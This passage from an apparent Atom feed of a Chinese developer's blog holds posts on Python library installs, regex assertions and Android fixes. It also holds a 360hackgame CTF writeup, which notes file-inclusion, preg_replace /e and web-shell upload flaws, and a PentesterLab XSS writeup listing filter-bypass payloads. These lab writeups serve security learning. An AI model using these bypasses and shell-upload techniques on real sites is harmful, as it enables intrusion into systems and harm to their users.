<p>尝试执行以下命令<br><figure class="highlight lua"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">xcode-<span class="built_in">select</span> <span class="comment">--install</span></span><br></pre></td></tr></table></figure></p>
<p>接下来在装lxml时又出现了问题。提示libxml/xmlversion.h 却少。<br>边google边分析,安装pycurl,依赖python包lxml,而lxml依赖库函数,什么是库函数,并不是python安装包,所以你是无法pip intall.所以我用brew来安装所需要的库函数。<br>然后又发现了一个坑,网上一般都只让你执行以下内容:<br><figure class="highlight cmake"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">brew <span class="keyword">install</span> libxml2</span><br><span class="line">brew <span class="keyword">install</span> libxslt</span><br></pre></td></tr></table></figure></p>
<p>然而你会发现这样并没有什么用。<br>所以继续找问题。<br>在尝试了很多中可能性之后,成功的解决。<br><figure class="highlight puppet"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">brew install libxml2</span><br><span class="line">brew install libxslt</span><br><span class="line">brew <span class="literal">link</span> libxml2 --<span class="literal">force</span></span><br><span class="line">brew <span class="literal">link</span> libxslt --<span class="literal">force</span></span><br></pre></td></tr></table></figure></p>
<p>如果还是没用,请先执行<br><figure class="highlight perl"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">brew <span class="keyword">unlink</span> libxml2</span><br><span class="line">brew <span class="keyword">unlink</span> libxslt</span><br></pre></td></tr></table></figure></p>
<p>在执行上面的内容。<br>成功解决问题!</p>
]]></content>
<summary type="html">
<![CDATA[<p>昨晚在安装pycurl的时候遇到了点问题,记录下解决的方法。<br>]]>
</summary>
<category term="pycurl" scheme="http://edward-l.github.io/tags/pycurl/"/>
<category term="python" scheme="http://edward-l.github.io/tags/python/"/>
<category term="python" scheme="http://edward-l.github.io/categories/python/"/>
</entry>
<entry>
<title><![CDATA[正则断言]]></title>
<link href="http://edward-l.github.io/2015/07/03/%E6%AD%A3%E5%88%99%E6%96%AD%E8%A8%80/"/>
<id>http://edward-l.github.io/2015/07/03/正则断言/</id>
<published>2015-07-03T03:30:16.000Z</published>
<updated>2015-07-03T05:10:21.000Z</updated>
<content type="html"><![CDATA[<p>在写点小东西的时候碰到了一段有意思的正则。<br>这个正则匹配是这样匹配超链接的<br><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">re.findall(<span class="string">r"(?<=href=\").+?(?=\")|(?<=href=\').+?(?=\')"</span>, data)</span><br></pre></td></tr></table></figure></p>
<a id="more"></a>
<p>他用到了<code>(?<=...)</code>和<code>(?=...)</code>这是什么意思呢?<br>而且他直接匹配出了<code><href = "....."></code>中引号里面的内容,真是神奇。<br>查找了下资料,发现断言还分了四个种类。<br>正则表达式的先行断言和后行断言一共有4种形式:<br><code>(?=pattern)</code> 零宽正向先行断言(zero-width positive lookahead assertion)<br><code>(?!pattern)</code>零宽负向先行断言(zero-width negative lookahead assertion)<br><code>(?<=pattern)</code> 零宽正向后行断言(zero-width positive lookbehind assertion)<br><code>(?<!pattern)</code> 零宽负向后行断言(zero-width negative lookbehind assertion)</p>
<p>这里面的pattern是一个正则表达式。<br>如同^代表开头,$代表结尾,\b代表单词边界一样,先行断言和后行断言也有类似的作用,它们只匹配某些位置,在匹配过程中,不占用字符,所以被称为“零宽”。所谓位置,是指字符串中(每行)第一个字符的左边、最后一个字符的右边以及相邻字符的中间(假设文字方向是头左尾右)。<br>下面分别举例来说明这4种断言的含义。<br><code>(?=pattern)</code> 正向先行断言<br>代表字符串中的一个位置,紧接该位置之后的字符序列能够匹配pattern。<br>例如对<code>”a regular expression”</code>这个字符串,要想匹配regular中的re,但不能匹配expression中的re,可以用<code>”re(?=gular)”</code>,该表达式限定了re右边的位置,这个位置之后是gular,但并不消耗gular这些字符,将表达式改为<code>”re(?=gular).”</code>,将会匹配reg,元字符.匹配了g,括号这一砣匹配了e和g之间的位置。<br><code>(?!pattern)</code> 负向先行断言<br>代表字符串中的一个位置,紧接该位置之后的字符序列不能匹配pattern。<br>例如对<code>”regex represents regular expression”</code>这个字符串,要想匹配除regex和regular之外的re,可以用<code>”re(?!g)”</code>,该表达式限定了re右边的位置,这个位置后面不是字符g。负向和正向的区别,就在于该位置之后的字符能否匹配括号中的表达式。<br><code>(?<=pattern)</code> 正向后行断言<br>代表字符串中的一个位置,紧接该位置之前的字符序列能够匹配pattern。<br>例如对<code>”regex represents regular expression”</code>这个字符串,有4个单词,要想匹配单词内部的re,但不匹配单词开头的re,可以用<code>”(?<=\w)re”</code>,单词内部的re,在re前面应该是一个单词字符。之所以叫后行断言,是因为正则表达式引擎在匹配字符串和表达式时,是从前向后逐个扫描字符串中的字符,并判断是否与表达式符合,当在表达式中遇到该断言时,正则表达式引擎需要往字符串前端检测已扫描过的字符,相对于扫描方向是向后的。<br><code>(?<!pattern)</code> 负向后行断言<br>代表字符串中的一个位置,紧接该位置之前的字符序列不能匹配pattern。<br>例如对<code>”regex represents regular expression”</code>这个字符串,要想匹配单词开头的re,可以用<code>”(?<!\w)re”</code>。单词开头的re,在本例中,也就是指不在单词内部的re,即re前面不是单词字符。当然也可以用<code>”\bre”</code>来匹配。</p>
]]></content>
<summary type="html">
<![CDATA[<p>在写点小东西的时候碰到了一段有意思的正则。<br>这个正则匹配是这样匹配超链接的<br><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">re.findall(<span class="string">r"(?<=href=\").+?(?=\")|(?<=href=\').+?(?=\')"</span>, data)</span><br></pre></td></tr></table></figure></p>]]>
</summary>
<category term="python" scheme="http://edward-l.github.io/tags/python/"/>
<category term="re" scheme="http://edward-l.github.io/tags/re/"/>
<category term="断言" scheme="http://edward-l.github.io/tags/%E6%96%AD%E8%A8%80/"/>
<category term="python" scheme="http://edward-l.github.io/categories/python/"/>
</entry>
<entry>
<title><![CDATA[灵魂鼓手]]></title>
<link href="http://edward-l.github.io/2015/05/26/%E7%81%B5%E9%AD%82%E9%BC%93%E6%89%8B/"/>
<id>http://edward-l.github.io/2015/05/26/灵魂鼓手/</id>
<published>2015-05-25T16:30:16.000Z</published>
<updated>2015-05-25T16:44:55.000Z</updated>
<content type="html"><![CDATA[<p>花了两天的时间去参加了这个黑客马拉松,拿了第二名,还是很开心的。<br>做了一个游戏。灵魂鼓手。<br>有兴趣的可以<a href="https://github.com/HDU-HackDay/DrummerKing" target="_blank" rel="external">戳这里</a>(github开源)去玩玩看。</p>
]]></content>
<summary type="html">
<![CDATA[<p>花了两天的时间去参加了这个黑客马拉松,拿了第二名,还是很开心的。<br>做了一个游戏。灵魂鼓手。<br>有兴趣的可以<a href="https://github.com/HDU-HackDay/DrummerKing" target="_blank" rel="exter]]>
</summary>
<category term="hackathon" scheme="http://edward-l.github.io/tags/hackathon/"/>
<category term="raspbian pi" scheme="http://edward-l.github.io/tags/raspbian-pi/"/>
<category term="raspbian pi" scheme="http://edward-l.github.io/categories/raspbian-pi/"/>
</entry>
<entry>
<title><![CDATA[requestWindowFeature(Window.FEATURE_NO_TITLE)导致程序崩溃]]></title>
<link href="http://edward-l.github.io/2015/05/12/requestWindowFeature/"/>
<id>http://edward-l.github.io/2015/05/12/requestWindowFeature/</id>
<published>2015-05-12T15:06:16.000Z</published>
<updated>2015-05-12T16:00:25.000Z</updated>
<content type="html"><![CDATA[<p>最近为了国赛开始看安卓了,这几天写的时候发现只要一些这个就会崩溃<br><figure class="highlight scss"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">requestWindowFeature</span>(Window<span class="class">.FEATURE_NO_TITLE</span>);</span><br></pre></td></tr></table></figure></p>
<p>找了个代替的方法记录一下,上面的是继承了<code>Activity</code>,我们改为继承<code>ActionBarActivity</code>然后把上面的代码换成<br><figure class="highlight ocaml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">android.support.v7.app.<span class="type">ActionBar</span> actionBar= getSupportActionBar<span class="literal">()</span>;</span><br><span class="line">actionBar.hide<span class="literal">()</span>;</span><br></pre></td></tr></table></figure></p>
]]></content>
<summary type="html">
<![CDATA[<p>最近为了国赛开始看安卓了,这几天写的时候发现只要一些这个就会崩溃<br><figure class="highlight scss"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pr]]>
</summary>
<category term="Andriod" scheme="http://edward-l.github.io/tags/Andriod/"/>
<category term="Android" scheme="http://edward-l.github.io/categories/Android/"/>
</entry>
<entry>
<title><![CDATA[360hackgame]]></title>
<link href="http://edward-l.github.io/2015/05/08/360hackgame/"/>
<id>http://edward-l.github.io/2015/05/08/360hackgame/</id>
<published>2015-05-08T13:30:16.000Z</published>
<updated>2015-05-09T02:41:36.000Z</updated>
<content type="html"><![CDATA[<h3 id="第一关">第一关</h3><p>提示要从<code>hack.360.cn</code>进去,改一下refere就可以了。</p>
<h3 id="第二关">第二关</h3><p>让我们找密码?那就找了~结果找到了这样一段js代码~<br><a id="more"></a></p>
<figure class="highlight nimrod"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><script src=<span class="string">"Public/js/encode.js"</span> language=<span class="string">"javascript"</span>></span><br><span class="line"><span class="keyword">var</span> password = eval(function(p,a,c,k,e,d){e=function(c){<span class="keyword">return</span>(c<a?<span class="string">""</span>:e(parseInt(c/a)))+((c=c%a)><span class="number">35</span>?<span class="type">String</span>.fromCharCode(c+<span class="number">29</span>):c.toString(<span class="number">36</span>))};<span class="keyword">if</span>(!''.replace(/^/,<span class="type">String</span>)){<span class="keyword">while</span>(c--)d[e(c)]=k[c]||e(c);k=[function(e){<span class="keyword">return</span> d[e]}];e=function(){<span class="keyword">return</span>'\\w+'};c=<span class="number">1</span>;};<span class="keyword">while</span>(c--)<span class="keyword">if</span>(k[c])p=p.replace(new <span class="type">RegExp</span>('\\b'+e(c)+'\\b','g'),k[c]);<span class="keyword">return</span> p;}('<span class="number">9</span> <span class="number">5</span>$=[<span class="string">"\\8\\3\\4\\3\\2\\2\\1\\3\\2\\3\\3\\2\\2\\7\\3\\1\\4\\1\\3\\2\\1\\3\\1\\3\\2\\2\\2\\1\\3\\4\\1\\3\\2\\1\\4\\1\\3\\2\\1\\4\\1\\3\\2\\2\\1\\3\\4\\1\\3\\2\\1\\4\\1\\3\\2\\1\\4\\1\\3\\2\\1\\4\\1\\3\\2\\1\\4\\1\\3\\2\\1\\4\\1\\3\\2\\2\\1\\3\\1\\3\\2\\2"</span>];<span class="number">6</span> c(){e[<span class="string">"\\f\\g\\d\\a\\b"</span>](<span class="number">5</span>$[<span class="number">0</span>])}',<span class="number">17</span>,<span class="number">17</span>,'|x2b|x5d|x5b|x21|_|function|x29|x28|<span class="keyword">var</span>|x72|x74|<span class="type">O0</span>|x65|window|x61|x6c'.split('|'),<span class="number">0</span>,{}));</span><br><span class="line"></script></span><br></pre></td></tr></table></figure>
<p>看起好烦啊,那就输出看看咯。<br>先在本地调试看看<br><figure class="highlight nimrod"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><script></span><br><span class="line">eval(function(p,a,c,k,e,d){e=function(c){<span class="keyword">return</span>(c<a?<span class="string">""</span>:e(parseInt(c/a)))+((c=c%a)><span class="number">35</span>?<span class="type">String</span>.fromCharCode(c+<span class="number">29</span>):c.toString(<span class="number">36</span>))};<span class="keyword">if</span>(!''.replace(/^/,<span class="type">String</span>)){<span class="keyword">while</span>(c--)d[e(c)]=k[c]||e(c);k=[function(e){<span class="keyword">return</span> d[e]}];e=function(){<span class="keyword">return</span>'\\w+'};c=<span class="number">1</span>;};<span class="keyword">while</span>(c--)<span class="keyword">if</span>(k[c])p=p.replace(new <span class="type">RegExp</span>('\\b'+e(c)+'\\b','g'),k[c]);<span class="keyword">return</span> p;}('<span class="number">9</span> <span class="number">5</span>$=[<span class="string">"\\8\\3\\4\\3\\2\\2\\1\\3\\2\\3\\3\\2\\2\\7\\3\\1\\4\\1\\3\\2\\1\\3\\1\\3\\2\\2\\2\\1\\3\\4\\1\\3\\2\\1\\4\\1\\3\\2\\1\\4\\1\\3\\2\\2\\1\\3\\4\\1\\3\\2\\1\\4\\1\\3\\2\\1\\4\\1\\3\\2\\1\\4\\1\\3\\2\\1\\4\\1\\3\\2\\1\\4\\1\\3\\2\\2\\1\\3\\1\\3\\2\\2"</span>];<span class="number">6</span> c(){e[<span class="string">"\\f\\g\\d\\a\\b"</span>](<span class="number">5</span>$[<span class="number">0</span>])}',<span class="number">17</span>,<span class="number">17</span>,'|x2b|x5d|x5b|x21|_|function|x29|x28|<span class="keyword">var</span>|x72|x74|<span class="type">O0</span>|x65|window|x61|x6c'.split('|'),<span class="number">0</span>,{}));</span><br><span class="line">document.write(_$)</span><br><span class="line"></script></span><br></pre></td></tr></table></figure></p>
<p>结果来了一个jsfuck的一段代码。<br>解一下,get flag!</p>
<h3 id="第三关">第三关</h3><p>解码?给了这么一段16进制</p>
<p><em><br>0x253444253534253435253335253439253434<br>25343525373725344425353325343125373825<br>34442534342536372536372534462535342536<br>42253637253444253534253435253738253439<br>25343425343525373725344625353325343125<br>37382534442534342534352536372534442535<br>34253435253332253439253434253435253738<br>25344425353325343125333125344425353325<br>34312533312534452534332534312533302534<br>46253433253431253344
</em></p>
<p>先转ascii,</p>
<p><em><br>%4D%54%45%35%49%44%45%77%4D%53%41%78%4D<br>%44%67%67%4F%54%6B%67%4D%54%45%78%49%44<br>%45%77%4F%53%41%78%4D%44%45%67%4D%54%45<br>%32%49%44%45%78%4D%53%41%31%4D%53%41%31<br>%4E%43%41%30%4F%43%41%3D
</em></p>
<p>urldecode</p>
<p><em><br>MTE5IDEwMSAxMDggOTkgMTExIDEwOSAxMDEgMTE2IDExMSA1MSA1NCA0OCA=
</em></p>
<p>ase64decode</p>
<p><em><br>119 101 108 99 111 109 101 116 111 51 54 48
</em></p>
<p>to ascii</p>
<p><em><br>welcometo360
</em></p>
<p>done!</p>
<h3 id="第四关">第四关</h3><p>发现图片后面还有一个图片。然后。。。。</p>
<h3 id="第五关">第五关</h3><p>google.<br><figure class="highlight groovy"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">php <span class="string">spy:</span> angel </span><br><span class="line">aspx <span class="string">spy:</span> admin </span><br><span class="line">jsp <span class="string">spy:</span> ninty</span><br></pre></td></tr></table></figure></p>
<h3 id="第六关">第六关</h3><p>之前做到过。一开始想到的时bat,后来想到vim的就swp了。然后发现了这么一坨。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line"> <span class="keyword">echo</span> htmlsepcialchars(<span class="variable">$str</span>); } <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__call</span><span class="params">(<span class="variable">$method</span>,<span class="variable">$args</span>)</span> </span><br><span class="line"> </span>{ <span class="keyword">if</span>( <span class="number">0</span> === strcasecmp(<span class="variable">$method</span>,ACTION_NAME.C(<span class="string">'ACTION_SUFFIX'</span>))) </span><br><span class="line"> { <span class="keyword">if</span>(method_exists(<span class="variable">$this</span>,<span class="string">'_empty'</span>)) { <span class="variable">$this</span>->_empty(<span class="variable">$method</span>,<span class="variable">$args</span>); }</span><br><span class="line"> <span class="keyword">elseif</span>(file_exists_case(C(<span class="string">'TEMPLATE_NAME'</span>))){ <span class="variable">$this</span>->display(); }</span><br><span class="line"> <span class="keyword">elseif</span>(function_exists(<span class="string">'__hack_action'</span>)) { __hack_action(); }</span><br><span class="line"> <span class="keyword">else</span>{ _404(L(<span class="string">'_ERROR_ACTION_'</span>).<span class="string">':'</span>.ACTION_NAME); } }<span class="keyword">else</span></span><br><span class="line"> { <span class="keyword">switch</span>(strtolower(<span class="variable">$method</span>)) </span><br><span class="line"> { <span class="keyword">case</span> <span class="string">'ispost'</span> : <span class="keyword">case</span> <span class="string">'isget'</span> : <span class="keyword">case</span> <span class="string">'ishead'</span> : <span class="keyword">case</span> <span class="string">'isdelete'</span> : <span class="keyword">case</span> <span class="string">'isput'</span> : <span class="keyword">return</span> strtolower</span><br><span class="line"> (<span class="variable">$_SERVER</span>[<span class="string">'REQUEST_METHOD'</span>]) == strtolower(substr(<span class="variable">$method</span>,<span class="number">2</span>)); </span><br><span class="line"> <span class="keyword">case</span> <span class="string">'_get'</span> : <span class="variable">$input</span> =& <span class="variable">$_GET</span>;<span class="keyword">break</span>;</span><br><span class="line"> <span class="keyword">case</span> <span class="string">'_post'</span> : <span class="variable">$input</span> =& <span class="variable">$_POST</span>;<span class="keyword">break</span>; </span><br><span class="line"> <span class="keyword">case</span> <span class="string">'_put'</span> : parse_str(file_get_contents(<span class="string">'php://input'</span>), <span class="variable">$input</span>);<span class="keyword">break</span>; </span><br><span class="line"> <span class="keyword">case</span> <span class="string">'_param'</span> : <span class="keyword">switch</span>(<span class="variable">$_SERVER</span>[<span class="string">'REQUEST_METHOD'</span>]) </span><br><span class="line"> { <span class="keyword">case</span> <span class="string">'POST'</span>: <span class="variable">$input</span> = <span class="variable">$_POST</span>; <span class="keyword">break</span>; <span class="keyword">case</span> <span class="string">'PUT'</span>: parse_str(file_get_contents(<span class="string">'php://input'</span>), <span class="variable">$input</span>); </span><br><span class="line"> <span class="keyword">break</span>; <span class="keyword">default</span>: <span class="variable">$input</span> = <span class="variable">$_GET</span>; } <span class="keyword">if</span>(C(<span class="string">'VAR_URL_PARAMS'</span>))</span><br><span class="line"> { <span class="variable">$params</span> = <span class="variable">$_GET</span>[C(<span class="string">'VAR_URL_PARAMS'</span>)]; <span class="variable">$input</span> = array_merge(<span class="variable">$input</span>,<span class="variable">$params</span>); }</span><br><span class="line"> <span class="keyword">break</span>; <span class="keyword">case</span> <span class="string">'_request'</span> : <span class="variable">$input</span> =& <span class="variable">$_REQUEST</span>; <span class="keyword">break</span>;</span><br><span class="line"> <span class="keyword">case</span> <span class="string">'_session'</span> : <span class="variable">$input</span> =& <span class="variable">$_SESSION</span>; <span class="keyword">break</span>; </span><br><span class="line"> <span class="keyword">case</span> <span class="string">'_cookie'</span> : <span class="variable">$input</span> =& <span class="variable">$_COOKIE</span>; <span class="keyword">break</span>; </span><br><span class="line"> <span class="keyword">case</span> <span class="string">'_server'</span> : <span class="variable">$input</span> =& <span class="variable">$_SERVER</span>; <span class="keyword">break</span>;</span><br><span class="line"> <span class="keyword">case</span> <span class="string">'_globals'</span> : <span class="variable">$input</span> =& <span class="variable">$GLOBALS</span>; <span class="keyword">break</span>; </span><br><span class="line"> <span class="keyword">default</span>: throw_exception(<span class="keyword">__CLASS__</span>.<span class="string">':'</span>.<span class="variable">$method</span>.L(<span class="string">'_METHOD_NOT_EXIST_'</span>)); } </span><br><span class="line"> <span class="keyword">if</span>(!<span class="keyword">isset</span>(<span class="variable">$args</span>[<span class="number">0</span>])) { <span class="variable">$data</span> = <span class="variable">$input</span>; }<span class="keyword">elseif</span>(<span class="keyword">isset</span>(<span class="variable">$input</span>[<span class="variable">$args</span>[<span class="number">0</span>]])) </span><br><span class="line"> { <span class="variable">$data</span> = <span class="variable">$input</span>[<span class="variable">$args</span>[<span class="number">0</span>]]; <span class="variable">$filters</span> = <span class="keyword">isset</span>(<span class="variable">$args</span>[<span class="number">1</span>])?<span class="variable">$args</span>[<span class="number">1</span>]:C(<span class="string">'DEFAULT_FILTER'</span>); </span><br><span class="line"><span class="keyword">if</span>(<span class="variable">$filters</span>) { <span class="variable">$filters</span> = explode(<span class="string">','</span>,<span class="variable">$filters</span>); <span class="keyword">foreach</span>(<span class="variable">$filters</span> <span class="keyword">as</span> <span class="variable">$filter</span>)</span><br><span class="line">{ <span class="keyword">if</span>(function_exists(<span class="variable">$filter</span>)) { <span class="variable">$data</span> = is_array(<span class="variable">$data</span>)?array_map(<span class="variable">$filter</span>,<span class="variable">$data</span>):<span class="variable">$filter</span>(<span class="variable">$data</span>); }</span><br><span class="line"> } } }<span class="keyword">else</span>{ <span class="variable">$data</span> = <span class="keyword">isset</span>(<span class="variable">$args</span>[<span class="number">2</span>])?<span class="variable">$args</span>[<span class="number">2</span>]:<span class="keyword">NULL</span>; } <span class="keyword">return</span> <span class="variable">$data</span>; } }</span><br><span class="line"> <span class="keyword">protected</span> <span class="function"><span class="keyword">function</span> <span class="title">_getNextKey</span><span class="params">()</span></span><br><span class="line"> </span>{ <span class="variable">$str</span> = base64_encode(<span class="string">"p7367p0r578pn8ons4n44p9qs9sqrq4s82c4372b97049560dfae1865e668fb3a"</span>);</span><br><span class="line"> <span class="keyword">return</span> md5(<span class="variable">$str</span>); } <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__destruct</span><span class="params">()</span> </span>{ <span class="keyword">if</span>(C(<span class="string">'LOG_RECORD'</span>)) Log::save(); tag(<span class="string">'action_end'</span>); } }</span><br></pre></td></tr></table></figure>
<p>根据这个就能拿到flag了<br><figure class="highlight axapta"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$<span class="keyword">str</span> = base64_encode(<span class="string">"p7367p0r578pn8ons4n44p9qs9sqrq4s82c4372b97049560dfae1865e668fb3a"</span>); <span class="keyword">return</span> md5($<span class="keyword">str</span>);</span><br></pre></td></tr></table></figure></p>
<h3 id="第七关">第七关</h3><p>无限脑洞题</p>
<p><code>Lilei20140305</code></p>
<h3 id="第八关">第八关</h3><p>代码审计,尝试了很多很多很多次之后终于过了=。=</p>
<figure class="highlight nimrod"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">include</span>('<span class="keyword">template</span>/' . $lang . '.php.html');</span><br></pre></td></tr></table></figure>
<p>对传进来的$lang没有过滤,直接include进来可能导致文件包含漏洞。</p>
<p> <code>preg_replace /e</code> 这个/e可以造成代码执行漏洞。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> (!file_exists(<span class="variable">$default_path</span>))</span><br><span class="line"> mkdir(<span class="variable">$default_path</span>, <span class="number">0777</span>, <span class="keyword">true</span>);</span><br><span class="line"> <span class="variable">$destination</span> = <span class="variable">$default_path</span> . basename(<span class="variable">$filename</span>);</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">'Saving your image to: '</span> . <span class="variable">$destination</span>;</span><br><span class="line"> <span class="variable">$jfh</span> = fopen(<span class="variable">$destination</span>, <span class="string">'w'</span>) <span class="keyword">or</span> <span class="keyword">die</span>(<span class="string">"can't open file"</span>);</span><br><span class="line"> fwrite(<span class="variable">$jfh</span>, <span class="variable">$GLOBALS</span>[<span class="string">'HTTP_RAW_POST_DATA'</span>]);</span><br></pre></td></tr></table></figure>
<p>这里他创建了一个777的目录,然后写入,文件名没有过滤,可以显示相对路径,$HTTP_RAW_POST_DATA 可以使用post往文件里写shell,直接getshell。<br><figure class="highlight aspectj"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">return</span> <span class="title">file_get_contents</span><span class="params">($templateFile)</span></span>;</span><br></pre></td></tr></table></figure></p>
<p>可以返回文件源码。</p>
<h3 id="第九关">第九关</h3><p>xss</p>
<h3 id="第十关">第十关</h3><p>没搞定,看了writeup<br>把应该是把cookie中的display当作get参数交了。然后在乌云上找了个洞就getflag了~</p>
]]></content>
<summary type="html">
<![CDATA[<h3 id="第一关">第一关</h3><p>提示要从<code>hack.360.cn</code>进去,改一下refere就可以了。</p>
<h3 id="第二关">第二关</h3><p>让我们找密码?那就找了~结果找到了这样一段js代码~<br>]]>
</summary>
<category term="360hackgame" scheme="http://edward-l.github.io/tags/360hackgame/"/>
<category term="writeup" scheme="http://edward-l.github.io/categories/writeup/"/>
</entry>
<entry>
<title><![CDATA[pip安装库时遇到的问题]]></title>
<link href="http://edward-l.github.io/2015/04/30/pip%E5%AE%89%E8%A3%85%E5%BA%93%E6%97%B6%E9%81%87%E5%88%B0%E7%9A%84%E9%97%AE%E9%A2%98/"/>
<id>http://edward-l.github.io/2015/04/30/pip安装库时遇到的问题/</id>
<published>2015-04-30T02:30:16.000Z</published>
<updated>2015-04-30T02:36:16.000Z</updated>
<content type="html"><![CDATA[<p>昨天晚上想要新装一个库,但是发现直接<code>sudo pip install</code>安装提示成功,但是直接在import的时候提示没有这个库,奇怪,又试着重新安装提示已经安装过了,然后看了下他的路径发现了一些问题。<br><figure class="highlight monkey"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="preprocessor"><span class="keyword">import</span> sys</span></span><br><span class="line">sys.path</span><br></pre></td></tr></table></figure></p>
<p>发现直接在终端里用python的时候它居然跑到了MAMP里的python,然后我直接用<code>pip</code>或者<code>easy_install</code>安装的库在<code>/Library/Python/2.7/site-packages/</code>所以自然就不能就调用了,看了下,MAMP中的python是一个软链接,直接改掉了MAMP中python的名字,这样他就直接调用了Library中的了,问题解决。看来还是MAMP的问题。</p>
]]></content>
<summary type="html">
<![CDATA[<p>昨天晚上想要新装一个库,但是发现直接<code>sudo pip install</code>安装提示成功,但是直接在import的时候提示没有这个库,奇怪,又试着重新安装提示已经安装过了,然后看了下他的路径发现了一些问题。<br><figure class="highli]]>
</summary>
<category term="MAMP" scheme="http://edward-l.github.io/tags/MAMP/"/>
<category term="pip" scheme="http://edward-l.github.io/tags/pip/"/>
<category term="python" scheme="http://edward-l.github.io/tags/python/"/>
<category term="python" scheme="http://edward-l.github.io/categories/python/"/>
</entry>
<entry>
<title><![CDATA[web_for_pentest writeup]]></title>
<link href="http://edward-l.github.io/2015/04/24/web_for_pentest%20writeup/"/>
<id>http://edward-l.github.io/2015/04/24/web_for_pentest writeup/</id>
<published>2015-04-24T13:30:16.000Z</published>
<updated>2015-04-24T13:37:19.000Z</updated>
<content type="html"><![CDATA[<p>A few days ago, I did web for pentest from PentesterLab.Now, this is the writeup form PentesterLab.You also can go <a href="https://pentesterlab.com/exercises/web_for_pentester/course" target="_blank" rel="external">here</a> to read the integral writeup.You also can go to <a href="http://lightless.me/archives/web-for-pentest-writeup.html" target="_blank" rel="external">lightless’s blog</a> , my thoughts are similar with him.<br><a id="more"></a></p>
<h2 id="XSS">XSS</h2><h3 id="Example_1">Example 1</h3><p>The first vulnerable example is just here to get you started with what is going on when you find a XSS. Using the basic payload, you should be able to get an alert box.</p>
<p>Make sure that you check the source code of the HTML page to see that the information you sent as part of the request is echoed back without any HTML encoding.</p>
<h3 id="Example_2">Example 2</h3><p>In the second example, a bit of filtering is involved. The web developer added some regular expressions, to prevent the simple XSS payload from working.</p>
<p>If you play around, you can see that <code><script></code> and <code></script></code> are filtered. One of the most basic ways to bypass these types of filters is to play with the case: if you try <code><sCript></code> and <code></sCRIpt></code> for example, you should be able to get the alert box.</p>
<h3 id="Example_3">Example 3</h3><p>You notified the developer about your bypass. He has added more filtering, wich now seems to prevent your previous payload. However, he is making a terrible mistake in his code (which was also present in the previous code)…</p>
<p>If you keep playing around, you will realise that if you use Pentest<code><script></code>erLab for payload, you can see PentesterLab in the page. You can probably use that to get <code><script></code> in the page, and your alert box to pop up.</p>
<h3 id="Example_4">Example 4</h3><p>In this example, the developer decided to completely blacklist the word script: if the request matches script, the execution stops.</p>
<p>Fortunately (or unfortunately depending on what side you are on), there are a lot of ways to get JavaScript to be run (non-exhaustive list):</p>
<blockquote>
<ul>
<li>with the <code><a</code> tag and for the following events: onmouseover (you will need to pass your mouse over the link), onmouseout, onmousemove, onclick …</li>
<li>with the <code><a</code> tag directly in the URL: <code><a href='javascript:alert(1)'...</code> (you will need to click the link to trigger the JavaScript code and remember that this won’t work since you cannot use script in this example).</li>
<li>with the <code><img</code> tag directly with the event onerror: <code><img src='zzzz' onerror='alert(1)' />.</code></li>
<li>with the <code><div</code> tag and for the following events: onmouseover (you will need to pass your mouse over the link), onmouseout, onmousemove, onclick…</li>
<li>…</li>
</ul>
</blockquote>
<p>You can use any of these techniques to get the alert box to pop-up.</p>
<h3 id="Example_5">Example 5</h3><p>In this example, the <code><script></code> tag is accepted and gets echoed back. But as soon as you try to inject a call to alert, the PHP script stops its execution. The problem seems to come from a filter on the word alert.</p>
<p>Using JavaScript’s eval and String.fromCharCode(), you should be able to get an alert box without using the word alert directly. String.fromCharCode() will decode an integer (decimal value) to the corresponding character.</p>
<p>You can write a small tool to transform your payload to this format using your favorite scripting language.</p>
<p>Using this trick and the ascii table, you can easily generate the string: alert(1) and call eval on it.</p>
